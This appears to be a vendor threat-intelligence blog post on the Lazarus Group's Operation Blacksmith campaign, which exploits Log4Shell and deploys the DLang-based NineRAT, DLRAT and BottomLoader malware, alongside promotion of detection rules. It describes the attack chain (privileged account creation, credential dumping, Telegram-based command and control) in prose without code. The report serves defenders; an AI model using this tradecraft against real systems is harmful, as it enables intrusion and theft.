Operation Blacksmith Detection: Lazarus APT Uses a CVE-2021-44228 Exploit to Deploy New DLang-Based Malware Strains
Table of contents:
Adversaries set their eyes on a notorious security flaw in Log4j Java Library tracked as CVE-2021-44228, aka Log4Shell, even a couple of years after its disclosure. A new campaign dubbed “Operation Blacksmith” involves the exploitation of the Log4Shell vulnerability to deploy new malicious strains written in DLang, including novel RATs. The North Korean APT Lazarus Group is believed to be behind the newly discovered Operation Blacksmith.
Detect Operation Blacksmith Activity Linked to Lazarus APT
North Korean nation-backed APT groups continue to pose threats to global organizations in multiple industry sectors. The nefarious Lazarus Group which has gained recognition as a proficient and well-financed hacking collective, wreaking havoc since 2009, resurfaces in the latest Operation Blacksmith campaign. SOC Prime Platform equips defenders with curated detection algorithms to timely identify Lazarus intrusions in the latest campaign. Follow the link below to obtain Sigma rules mapped to MITRE ATT&CK®, enriched with tailored intel, and tailored for dozens of security analytics platforms.
Sigma rules to detect Operation Blacksmith campaign attributed to Lazarus APT
Also, security engineers can rely on detections to defend against attacks by Onyx Sleet aka Andariel APT, a North Korean state-sponsored sub-group operating under the Lazarus umbrella:
Sigma rules to detect attacks linked to Andariel APT
Sigma rules to detect attacks linked to Onyx Sleet
Click Explore Detections to reach the entire detection stack for attacks linked to Lazarus and tagged accordingly. Dive into extensive metadata, including ATT&CK and CTI links, for streamlined threat research. Alternatively, drill down to curated detections to proactively defend against Hidden Cobra or APT38 attacks filtered by the custom tags based on the related actor attribution.
Operation Blacksmith Analysis: Insights into the Exploitation of CVE-2021-44228 to Deploy New Telegram-Based Malware
The nation-backed hacking collective Lazarus (aka APT38, Dark Seoul, or Hidden Cobra) from North Korea continues to weaponize the 2-year-old CVE-2021-44228 aka Log4Shell vulnerability for spreading three novel malware strains developed in the DLang programming language. These newly identified malware families include two previously unknown RATs called NineRAT and DLRAT, accompanied with a malicious downloader dubbed BottomLoader. The novel campaign discovered by Cisco Talos has come to the spotlight under the name “Operation Blacksmith” with manufacturing, agriculture, and the physical security sectors being the primary targets of attackers.
The attack chain starts with the successful exploitation of CVE-2021-44228 serving as the entry point to targeted servers. After gaining initial access, Lazarus conducts preliminary reconnaissance, which then paves the way for deploying a custom implant onto the compromised system. Afterward, Lazarus deploys HazyLoad, a proxy tool designed to create direct access to the compromised system, eliminating the need for recurrent exploitation of CVE-2021-44228. Hackers also establish an extra user account on the system, endowing it with admin privileges. Following the successful credential dumping, Lazarus proceeds to install NineRAT on the impacted systems. NineRAT is leveraging the Telegram API for C2 communication. The malware includes a dropper designed for creating persistence and initiating the primary binaries. The use of Telegram is highly likely used for detection evasion by leveraging a legitimate service for C2 communication.
The non-Telegram-based malware known as DLRAT enables Lazarus hackers to deploy additional payloads on compromised systems. Upon initial activation on a device, DLRAT performs predefined commands to collect basic system data, which is further sent to the C2 server.
The third malware employed in the Blacksmith Operation called BottomLoader is a DLang-based downloader intended for system reconnaissance that retrieves and runs payloads from a predefined URL through PowerShell. BottomLoader allows Lazarus APT to transfer files from the impacted system to the C2 server, enhancing operational flexibility.
Talos researchers have observed that over the past 18 months, Lazarus leveraged RATs developed via unconventional technologies, including QtFramework, PowerBasic, and, most recently, written in DLang.
Notably, Talos also tracks similarities between the most recent Lazarus campaign based on the observed adversary TTPs that are consistent with the North Korean state-sponsored group Onyx Sleet (aka PLUTIONIUM), also tracked as the Andariel APT group. The latter is commonly acknowledged as an APT sub-unit operating within the Lazarus umbrella.
Operation Blacksmith marks a significant change in the Lazarus Group’s TTPs, displaying the continuous evolution of the adversary toolkit employed by the malicious actors. Log in to SOC Prime Platform to gain access to 6,000+ pieces of content from the Threat Detection Marketplace repository to proactively detect existing and emerging APT attacks of any scale.
